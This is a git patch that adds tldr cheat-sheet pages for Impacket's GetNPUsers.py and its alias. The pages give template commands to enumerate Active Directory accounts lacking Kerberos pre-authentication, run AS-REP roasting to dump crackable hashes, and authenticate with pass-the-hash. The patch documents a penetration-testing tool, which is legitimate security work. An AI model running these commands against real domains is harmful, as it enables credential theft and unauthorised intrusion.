From e9af487030cf6728b6340d2a7a9f465eb8f7f0b8 Mon Sep 17 00:00:00 2001
From: Machiavelli <145562237+MachiavelliII@users.noreply.github.com>
Date: Wed, 5 Mar 2025 02:18:18 +0200
Subject: [PATCH] GetNPUsers.py, impacket-GetNPUsers: add page (#15833)

---
 pages/common/getnpusers.py.md       | 25 +++++++++++++++++++++++++
 pages/common/impacket-getnpusers.md |  9 +++++++++
 2 files changed, 34 insertions(+)
 create mode 100644 pages/common/getnpusers.py.md
 create mode 100644 pages/common/impacket-getnpusers.md

diff --git a/pages/common/getnpusers.py.md b/pages/common/getnpusers.py.md
new file mode 100644
index 0000000000..c9a6234211
--- /dev/null
+++ b/pages/common/getnpusers.py.md
@@ -0,0 +1,25 @@
+# GetNPUsers.py
+
+> Enumerate Active Directory accounts with Kerberos pre-authentication disabled, which may be susceptible to AS-REP roasting attacks.
+> Part of the Impacket suite.
+> More information: <https://github.com/fortra/impacket>.
+
+- Enumerate users with Kerberos pre-authentication disabled (default anonymous enumeration):
+
+`GetNPUsers.py {{domain}}/ -usersfile {{path/to/userslist}} -dc-ip {{domain_controller_ip}}`
+
+- Perform AS-REP roasting and dump crackable hashes for offline cracking:
+
+`GetNPUsers.py {{domain}}/ -usersfile {{path/to/userslist}} -dc-ip {{domain_controller_ip}} -request`
+
+- Authenticate with valid credentials (if anonymous binding is disabled):
+
+`GetNPUsers.py {{domain}}/{{username}}:{{password}} -usersfile {{path/to/userslist}} -dc-ip {{domain_controller_ip}}`
+
+- Use pass-the-hash authentication instead of a password:
+
+`GetNPUsers.py {{domain}}/{{username}} -hashes {{LM_Hash}}:{{NT_Hash}} -usersfile {{path/to/userslist}} -dc-ip {{domain_controller_ip}}`
+
+- Save the output to a file for further analysis:
+
+`GetNPUsers.py {{domain}}/ -usersfile {{path/to/userslist}} -dc-ip {{domain_controller_ip}} -request > {{output.txt}}`
diff --git a/pages/common/impacket-getnpusers.md b/pages/common/impacket-getnpusers.md
new file mode 100644
index 0000000000..f7137e09d0
--- /dev/null
+++ b/pages/common/impacket-getnpusers.md
@@ -0,0 +1,9 @@
+# impacket-GetNPUsers
+
+> This command is an alias of `GetNPUsers.py`.
+> Part of the Impacket suite.
+> More information: <https://github.com/fortra/impacket>.
+
+- View documentation for the original command:
+
+`tldr GetNPUsers.py`